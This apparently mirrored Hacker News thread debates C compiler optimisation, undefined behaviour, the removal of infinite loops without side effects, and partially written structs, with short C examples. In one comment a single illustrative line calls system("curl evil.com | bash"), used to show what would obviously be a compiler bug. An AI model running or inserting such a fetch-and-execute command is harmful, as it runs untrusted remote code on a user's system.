| HN Mirror

Y	Hacker News new \| ask \| show \| jobs

by a1369209993 2296 days ago

Do you mean `x = slow_function_no_side_effects( x );`? Because if slow_function_no_side_effects really doesn't have side effects, then your version is equivalent to:

  x = slow_function_no_side_effects(); /* only once */
  if(x > 1) for(;;) { /* infinite loop */ }
  return mode ? 1 : x;

That said, I suppose it might be reasonable to explicitly note that a optimiser is allowed to make a program or subroutine complete in less time than it otherwise would, even that reduces the execution time from infinite to finite. That doesn't imply inferring any new facts about the program - either loop termination or otherwise - though. On the other hand it might be better to not allow that; you could make a case that the optimisation you describe is a algorithmic change, and if the programmer wants better performance, they need to write:

  unsigned long long test(unsigned long long x, int mode)
    {
    if(mode) return 1; /* early exit */
    do x = slow_function_no_side_effects(x);
    while(x > 1);
    return x;
    }

, just the same as if they wanted their sorting algorithm to complete in linear time on already-sorted inputs.

1 comments

flatfinger 2295 days ago

Yeah, I meant `slow_function_no_side_effects(x)`. My point is that there's a huge difference between saying that a compiler need not treat a loop as sequenced with regard to outside code if none of the operations therein are likewise sequenced, versus saying that if a loop without side effects fails to terminate, compiler writers should regard all imaginable actions the program could perform as equally acceptable.

In a broader sense, I think the problem is that the authors of the Standard have latched onto the idea that optimizations must not be observable unless a program invokes Undefined Behavior, and consequently any action that would make the effects of an optimization visible must be characterized as UB.

I think it would be far more useful to recognize that optimizations may, on an opt-in or opt-out basis, be allowed to do various things whose effects would be observable, and correct programs that would allow such optimizations must work correctly for any possible combination of effects. Consider the function:

    struct blob { uint16_t a[100]; } x,y,z;

    void test1(int *dat, int n)
    {
      struct blob temp;
      for (int i=0; i<n; i++)
        temp.a[i] = i;
      x=temp;
      y=temp;

    }
    void test2(void)
    {
      int indices[] = {1,0};
      test1(indices, 2);
      z=x;
    }

Should the behavior of test2() be defined despite the fact that `temp` is not fully written before it is copied to `x` and `y`? What if anything should be guaranteed about the values of `x.a[2..99]`, `y.a[2..99]`, and `z.a[2..99]`?

While I would allow programmer to include directives mandating more precise behavior or allowing less precise behavior, I think the most useful set of behavioral guarantees would allow those elements of `x` and `y` to hold arbitrarily different values, but that `x` and `z` would match. My rationale would be that a programmer who sees `x` and `y` assigned from `temp` would be able to see where `temp` was created, and would be able to see that some parts of it might not have been written. If the programmer cared about ensuring that the parts of `x` and `y` corresponding to the unwritten parts matched, there would be many ways of doing that. If the programmer fails to do any of those things, it's likely because the programmer doesn't care about those values.

The programmer of function `test2()`, however, would generally have no way of knowing whether any part of `x` might hold something that won't behave as some possibly-meaningless number. Further, there's no practical way that the author of `test2` could ensure anything about the parts of `x` corresponding to parts of `temp` that don't be written. Thus, a compiler should not make any assumptions about whether a programmer cares about whether `z.a[2..99]` match `x.a[2..99]`.

A compiler's decision to optimize out assignments to `x[2..99]` and `y[2..99]` may be observable, but if code would not, in fact, care about whether `x[2..99]` and `y[2..99]` match, the fact that the optimization may cause the arrays to hold different Unspecified values should not affect any other aspect of program execution.

link

a1369209993 2295 days ago

> there's a huge difference between saying that a compiler need not treat a loop as sequenced with regard to outside code if none of the operations therein are likewise sequenced, versus saying that if a loop without side effects fails to terminate, compiler writers should regard all imaginable actions the program could perform as equally acceptable.

Yes, definitely true. It's debatable whether it's okay for a compiler to rewrite code as in second example at https://news.ycombinator.com/item?id=22903396 , but it is not debatable that rewriting it as with anything equivalent to:

  if(x > 1 && x == slow_function_no_side_effects(x))
    { system("curl evil.com | bash"); }

is a compiler bug, undefined behaviour be damned.

> that the authors of the Standard have latched onto the idea that optimizations must not be observable unless a program invokes Undefined Behavior

I don't know if this quite characterizes the actual reasoning, but it does seem like a good summary of the overall situation, with "we might do x0 or x1, so x is undefined behaviour" ==> "x is undefined, so we'll do x79, even though we know that's horrible and obviously wrong".

> I think the most useful set of behavioral guarantees would allow those elements of `x` and `y` to hold arbitrarily different values, but that `x` and `z` would match.

Actually, I'm not sure that makes sense; your code is equivalent to:

  struct blob { uint16_t a[100]; } x,y,z;
  
  void test2(void)
    {
    int indices[] = {1,0};
    ; {
      int* dat = indices;
      int n = 2;
      ; {
        struct blob temp;
        for(int i=0; i<n; i++) temp.a[i] = i;
        /* should that be dat[i] ? */
        x=temp;
        y=temp;
        }
      }
    z=x;
    }

I don't think it makes sense to treat x=temp differently from z=x. Maybe if you treat local variables (temp) differently from global variables (x,y,z) but that seems brittle. (What happens if x,y,z are moved inside test2? What if temp is moved out? Does accessing some or all of them through pointers change things?)

link

flatfinger 2295 days ago

The indent is getting rather crazy on this thread; I'll reply further up-thread so as to make the indent less crazy.

link